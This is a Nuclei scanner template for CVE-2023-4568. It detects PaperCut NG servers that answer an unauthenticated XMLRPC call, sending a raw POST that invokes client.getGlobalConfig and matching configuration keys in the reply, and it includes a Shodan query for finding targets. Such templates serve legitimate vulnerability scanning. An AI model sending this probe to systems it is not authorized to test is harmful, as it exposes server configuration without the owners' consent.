nuclei-templates/http/cves/2023/CVE-2023-4568.yaml

57 lines
1.9 KiB
YAML

id: CVE-2023-4568
info:
name: PaperCut NG Unauthenticated XMLRPC Functionality
author: DhiyaneshDK
severity: medium
description: |
PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4568
- https://www.tenable.com/security/research/tra-2023-31
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2023-4568
cwe-id: CWE-287
epss-score: 0.00254
epss-percentile: 0.6331
cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: papercut
product: papercut_ng
shodan-query: html:"content=\"PaperCut\""
tags: cve2023,cve,unauth,papercut
http:
- raw:
- |
POST /rpc/clients/xmlrpc HTTP/1.1
Host: {{Hostname}}
Content-Type:text/xml
<?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'conf.ssl-port'
- 'conf.auth-ttl-default'
condition: and
- type: word
part: header
words:
- text/xml
- type: status
status:
- 200
# digest: 4b0a00483046022100ee5ada48a3dd406ae7018f21602051a17a932e804c07e4ccce39b100785650b6022100bcffae90accdde9bd822c98681bfe4d53eda75f993855cdf552fa3ca9519dc22:922c64590222798bb761d5b6d8e72950